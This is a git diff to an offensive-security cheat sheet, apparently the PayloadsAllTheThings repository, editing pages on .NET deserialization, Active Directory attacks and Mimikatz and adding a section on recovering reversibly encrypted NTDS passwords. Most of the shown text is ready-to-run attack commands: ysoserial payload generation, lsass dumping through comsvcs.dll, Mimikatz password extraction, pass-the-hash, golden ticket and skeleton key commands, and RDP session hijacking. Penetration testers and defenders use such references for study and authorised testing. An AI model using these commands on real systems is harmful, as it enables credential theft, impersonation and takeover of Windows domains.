NTDS Reversible Encryption

Insecure Deserialization/DotNET.md

@@ -83,6 +83,7 @@ $ ./ysoserial.exe -f BinaryFormatter -g PSObject -o base64 -c "calc" -t
 
 ### JSON.NET
 
+* In C# source code, look for `JsonConvert.DeserializeObject<Expected>(json, new JsonSerializerSettings`.
 * Payload output: **JSON**
 
 ```ps1

Methodology and Resources/Active Directory Attack.md

@@ -40,6 +40,7 @@
       - [Using Mimikatz DCSync](#using-mimikatz-dcsync)
       - [Using Mimikatz sekurlsa](#using-mimikatz-sekurlsa)
       - [Crack NTLM hashes with hashcat](#crack-ntlm-hashes-with-hashcat)
+      - [NTDS Reversible Encryption](#ntds-reversible-encryption)
     - [User Hunting](#user-hunting)
     - [Password spraying](#password-spraying)
       - [Kerberos pre-auth bruteforcing](#kerberos-pre-auth-bruteforcing)
@@ -482,24 +483,27 @@ Replace the customqueries.json file located at `/home/username/.config/bloodhoun
 
 This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine.
 
-```powershell
-# remote
-rpcclient $> lookupnames john.smith
-john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
-
-# loc
-wmic useraccount get name,sid
-Administrator  S-1-5-21-3415849876-833628785-5197346142-500   
-Guest          S-1-5-21-3415849876-833628785-5197346142-501   
-Administrator  S-1-5-21-297520375-2634728305-5197346142-500   
-Guest          S-1-5-21-297520375-2634728305-5197346142-501   
-krbtgt         S-1-5-21-297520375-2634728305-5197346142-502   
-lambda         S-1-5-21-297520375-2634728305-5197346142-1110 
-
-# powerview
-Convert-NameToSid high-sec-corp.localkrbtgt
-S-1-5-21-2941561648-383941485-1389968811-502
-```
+* RPCClient
+  ```powershell
+  rpcclient $> lookupnames john.smith
+  john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
+  ```
+* WMI
+  ```powershell
+  wmic useraccount get name,sid
+  Administrator  S-1-5-21-3415849876-833628785-5197346142-500   
+  Guest          S-1-5-21-3415849876-833628785-5197346142-501   
+  Administrator  S-1-5-21-297520375-2634728305-5197346142-500   
+  Guest          S-1-5-21-297520375-2634728305-5197346142-501   
+  krbtgt         S-1-5-21-297520375-2634728305-5197346142-502   
+  lambda         S-1-5-21-297520375-2634728305-5197346142-1110 
+  ```
+* Powerview
+  ```powershell
+  Convert-NameToSid high-sec-corp.localkrbtgt
+  S-1-5-21-2941561648-383941485-1389968811-502
+  ```
+* CrackMapExec: `crackmapexec ldap DC1.lab.local -u username -p password -k --get-sid`  
 
 ```bash
 Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
@@ -1329,6 +1333,22 @@ $ python2 maskgen.py hashcat.mask --targettime 3600 --optindex -q -o hashcat_1H.
 - [crackstation.net](https://crackstation.net)
 - [hashes.com](https://hashes.com/en/decrypt/hash)
 
+
+#### NTDS Reversible Encryption
+
+`UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED` ([0x00000080](http://www.selfadsi.org/ads-attributes/user-userAccountControl.htm)), if this bit is set, the password for this user stored encrypted in the directory - but in a reversible form.
+
+The key used to both encrypt and decrypt is the SYSKEY, which is stored in the registry and can be extracted by a domain admin.
+This means the hashes can be trivially reversed to the cleartext values, hence the term “reversible encryption”.
+
+* List users with "Store passwords using reversible encryption" enabled
+    ```powershell
+    Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl
+    ```
+
+The password retrieval is already handled by [SecureAuthCorp/secretsdump.py](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py) and mimikatz, it will be displayed as CLEARTEXT. 
+
+
 ### User Hunting
 
 Sometimes you need to find a machine where a specific user is logged in.    

Methodology and Resources/Windows - Mimikatz.md

@@ -2,25 +2,25 @@
 
 ## Summary
 
-* [Mimikatz - Execute commands](#mimikatz---execute-commands)
-* [Mimikatz - Extract passwords](#mimikatz---extract-passwords)
-* [Mimikatz - LSA Protection Workaround](#mimikatz---lsa-protection-workaround)
-* [Mimikatz - Mini Dump](#mimikatz---mini-dump)
-* [Mimikatz - Pass The Hash](#mimikatz---pass-the-hash)
-* [Mimikatz - Golden ticket](#mimikatz---golden-ticket)
-* [Mimikatz - Skeleton key](#mimikatz---skeleton-key)
-* [Mimikatz - RDP session takeover](#mimikatz---rdp-session-takeover)
-* [Mimikatz - Credential Manager & DPAPI](#mimikatz---credential-manager--dpapi)
+* [Execute commands](#execute-commands)
+* [Extract passwords](#extract-passwords)
+* [LSA Protection Workaround](#lsa-protection-workaround)
+* [Mini Dump](#mini-dump)
+* [Pass The Hash](#pass-the-hash)
+* [Golden ticket](#golden-ticket)
+* [Skeleton key](#skeleton-key)
+* [RDP session takeover](#rdp-session-takeover)
+* [Credential Manager & DPAPI](#credential-manager--dpapi)
   * [Chrome Cookies & Credential](#chrome-cookies--credential)
   * [Task Scheduled credentials](#task-scheduled-credentials)
   * [Vault](#vault)
-* [Mimikatz - Commands list](#mimikatz---commands-list)
-* [Mimikatz - Powershell version](#mimikatz---powershell-version)
+* [Commands list](#commands-list)
+* [Powershell version](#powershell-version)
 * [References](#references)
 
 ![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png)
 
-## Mimikatz - Execute commands
+## Execute commands
 
 Only one command
 
@@ -38,7 +38,7 @@ mimikatz # sekurlsa::logonpasswords
 mimikatz # sekurlsa::wdigest
 ```
 
-## Mimikatz - Extract passwords
+## Extract passwords
 
 > Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled.
 
@@ -63,7 +63,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
   * Adding requires lock
   * Removing requires reboot
 
-## Mimikatz - LSA Protection Workaround
+## LSA Protection Workaround
 
 - LSA as a Protected Process (RunAsPPL)
   ```powershell
@@ -108,7 +108,7 @@ reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLo
   ```
 
 
-## Mimikatz - Mini Dump
+## Mini Dump
 
 Dump the lsass process with `procdump`
 
@@ -132,22 +132,22 @@ rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump $lsass_pid C:\temp\lsass.
 ```
 
 
+Use the minidump:
+* Mimikatz: `.\mimikatz.exe "sekurlsa::minidump lsass.dmp"`
+  ```powershell
+  mimikatz # sekurlsa::minidump lsass.dmp
+  mimikatz # sekurlsa::logonPasswords
+  ```
+* Pypykatz: `pypykatz lsa minidump lsass.dmp`
 
-Then load it inside Mimikatz.
 
-```powershell
-mimikatz # sekurlsa::minidump lsass.dmp
-Switch to minidump
-mimikatz # sekurlsa::logonPasswords
-```
-
-## Mimikatz - Pass The Hash
+## Pass The Hash
 
 ```powershell
 mimikatz # sekurlsa::pth /user:SCCM$ /domain:IDENTITY /ntlm:e722dfcd077a2b0bbe154a1b42872f4e /run:powershell
 ```
 
-## Mimikatz - Golden ticket
+## Golden ticket
 
 ```powershell
 .\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
@@ -157,7 +157,7 @@ mimikatz # sekurlsa::pth /user:SCCM$ /domain:IDENTITY /ntlm:e722dfcd077a2b0bbe15
 .\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
 ```
 
-## Mimikatz - Skeleton key
+## Skeleton key
 
 ```powershell
 privilege::debug
@@ -168,17 +168,25 @@ net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
 rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
 ```
 
-## Mimikatz - RDP session takeover
+## RDP session takeover
 
 Use `ts::multirdp` to patch the RDP service to allow more than two users.
 
-Run tscon.exe as the SYSTEM user, you can connect to any session without a password.
+* Enable privileges
+  ```powershell
+  privilege::debug 
+  token::elevate 
+  ```
+* List RDP sessions
+  ```powershell
+  ts::sessions
+  ```
+* Hijack session
+  ```powershell
+  ts::remote /id:2 
+  ```
 
-```powershell
-privilege::debug 
-token::elevate 
-ts::remote /id:2 
-```
+Run `tscon.exe` as the SYSTEM user, you can connect to any session without a password.
 
 ```powershell
 # get the Session ID you want to hijack
@@ -188,7 +196,7 @@ net start sesshijack
 ```
 
 
-## Mimikatz - Credential Manager & DPAPI
+## Credential Manager & DPAPI
 
 ```powershell
 # check the folder to find credentials
@@ -235,7 +243,7 @@ Attributes : 0
 vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
 ```
 
-## Mimikatz - Commands list
+## Commands list
 
 | Command |Definition|
 |:----------------:|:---------------|
@@ -262,7 +270,7 @@ vault::cred /in:C:\Users\demo\AppData\Local\Microsoft\Vault\"
 |TOKEN::Elevate | impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box|
 |TOKEN::Elevate /domainadmin | impersonate a token with Domain Admin credentials.
 
-## Mimikatz - Powershell version
+## Powershell version
 
 Mimikatz in memory (no binary on disk) with :